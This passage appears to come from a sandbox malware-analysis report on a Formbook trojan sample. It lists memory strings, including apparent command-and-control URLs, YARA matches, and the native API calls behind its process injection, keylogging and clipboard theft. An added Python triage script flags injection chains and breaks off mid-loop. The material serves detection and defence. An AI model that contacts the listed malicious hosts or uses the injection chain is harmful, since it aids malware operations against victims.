64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 22 Oct 2024 20:58:52 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000040B2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://emailverification.info/
            Source: jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000004244000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.givingaway123.net/1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2
            Source: jEsBIhfnof.exe, 00000006.00000002.4511141181.00000000056A1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.productanalytics.pro
            Source: jEsBIhfnof.exe, 00000006.00000002.4511141181.00000000056A1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.productanalytics.pro/9vwi/
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: schtasks.exe, 00000004.00000002.4508662469.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: schtasks.exe, 00000004.00000002.4508662469.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: schtasks.exe, 00000004.00000002.4508662469.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_des
            Source: schtasks.exe, 00000004.00000002.4508662469.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: schtasks.exe, 00000004.00000002.4508662469.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: schtasks.exe, 00000004.00000002.4508662469.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: schtasks.exe, 00000004.00000002.4508662469.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: schtasks.exe, 00000004.00000003.2399701813.000000000748C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: schtasks.exe, 00000004.00000002.4510450854.0000000004230000.00000004.10000000.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000003F20000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=stocksm.fun
            Source: schtasks.exe, 00000004.00000002.4510450854.0000000004230000.00000004.10000000.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000003F20000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000040B2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.icann.org/resources/pages/non-response-2014-01-29-en
            Source: jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000003A6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sailforever.xyz/hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042BEA3 NtClose,2_2_0042BEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C70 NtFreeVirtualMemory,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B73D70 NtOpenThread
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F24340 NtSetContextThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F24650 NtSuspendThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22AF0 NtWriteFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22AD0 NtReadFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22B60 NtClose, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22EE0 NtQueueApcThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22FE0 NtCreateFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22FB0 NtResumeThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22F30 NtCreateSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22CA0 NtQueryInformationToken, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22C70 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22C60 NtCreateKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22DF0 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22DD0 NtDelayExecution, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22D30 NtUnmapViewOfSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22D10 NtMapViewOfSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F235C0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F239B0 NtGetContextThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F22D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F23090 NtSetValueKey
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F23010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F23D70 NtOpenThread
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F23D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_00468CE0 NtCreateFile
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_00468E50 NtReadFile
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_00468F50 NtDeleteFile
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_00469000 NtClose
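The native API listing above is the raw evidence behind the report's injection signatures: schtasks.exe (process 4) resolves NtCreateSection, NtMapViewOfSection, NtWriteVirtualMemory, NtQueueApcThread, NtSetContextThread and NtResumeThread, which together are the map/write/execute chain flagged as "Maps a DLL or memory area into another process", "Queues an APC in another process" and "Modifies the context of a thread in another process". The Python below is an added example, not part of the Joe Sandbox report or of its tooling: it parses lines in this report's "Code function" format (a few copied above as constructed sample input, in the fused form the page extraction produced), drops the address token that the extraction repeats at the end of each line, builds the per-process set of API names, and reports which stages of a write-then-execute injection chain each process exhibits. The stage grouping (INJECTION_STAGES) is my own triage heuristic, not a Joe Sandbox rule.

```python
"""Triage helper for Joe Sandbox "Code function" evidence lines (added example)."""
import re
from collections import defaultdict

# Constructed sample input: a few lines copied from the report's own listing,
# in the fused form the page extraction produced (no space before "Code function",
# address token repeated at the end of the line).
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F24340 NtSetContextThread,LdrInitializeThunk,4_2_02F24340
Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22EE0 NtQueueApcThread,LdrInitializeThunk,4_2_02F22EE0
Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22FB0 NtResumeThread,LdrInitializeThunk,4_2_02F22FB0
Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22F30 NtCreateSection,LdrInitializeThunk,4_2_02F22F30
Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22D10 NtMapViewOfSection,LdrInitializeThunk,4_2_02F22D10
Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22E30 NtWriteVirtualMemory,4_2_02F22E30
Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004120380_2_00412038
Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
"""

# Joe Sandbox address token: <process index>_<run>_<8 hex digits>.
ADDR_RE = re.compile(r"\d+_\d+_[0-9A-Fa-f]{8}")
LINE_RE = re.compile(
    r"^Source:\s*(?P<path>.+?)\s*Code function:\s*"
    r"(?P<addr>\d+_\d+_[0-9A-Fa-f]{8}):?\s*(?P<rest>.*)$"
)

# Heuristic grouping (my own, not a Joe Sandbox rule) of native APIs into the
# stages of a write-then-execute injection into another process.
INJECTION_STAGES = {
    "prepare_memory": {"NtAllocateVirtualMemory", "NtCreateSection",
                       "NtMapViewOfSection", "NtProtectVirtualMemory"},
    "write_payload": {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "run_payload": {"NtQueueApcThread", "NtSetContextThread",
                    "NtCreateThreadEx", "NtResumeThread"},
}


def parse_code_function(line):
    """Return (process_path, address, [api names]) or None if the line is not a
    "Code function" entry. Address tokens repeated at the end of the line (link
    residue from the page extraction) are dropped from the API list."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    tokens = [t for t in re.split(r"[,\s]+", m.group("rest")) if t]
    apis = [t for t in tokens if not ADDR_RE.fullmatch(t)]
    return m.group("path"), m.group("addr"), apis


def apis_by_process(text):
    """Map each process path to the set of API names seen in its entries."""
    seen = defaultdict(set)
    for line in text.splitlines():
        parsed = parse_code_function(line)
        if parsed:
            path, _addr, apis = parsed
            seen[path].update(apis)
    return dict(seen)


def injection_stages(api_set):
    """Names of the injection stages for which at least one API is present."""
    return [stage for stage, needles in INJECTION_STAGES.items() if api_set & needles]


def looks_like_injector(api_set):
    """True only when every stage (prepare, write, run) is covered, which is the
    combination the report flags as mapping memory, writing it and then queuing
    an APC or setting a thread context in another process."""
    return len(injection_stages(api_set)) == len(INJECTION_STAGES)


def triage(text):
    """Per-process summary: native (Nt*) APIs, stages present, and verdict."""
    report = {}
    for path, apis in apis_by_process(text).items():
        report[path] = {
            "native_apis": sorted(a for a in apis if a.startswith("Nt")),
            "stages": injection_stages(apis),
            "injector": looks_like_injector(apis),
        }
    return report


if __name__ == "__main__":
    for path, info in triage(SAMPLE_LINES).items():
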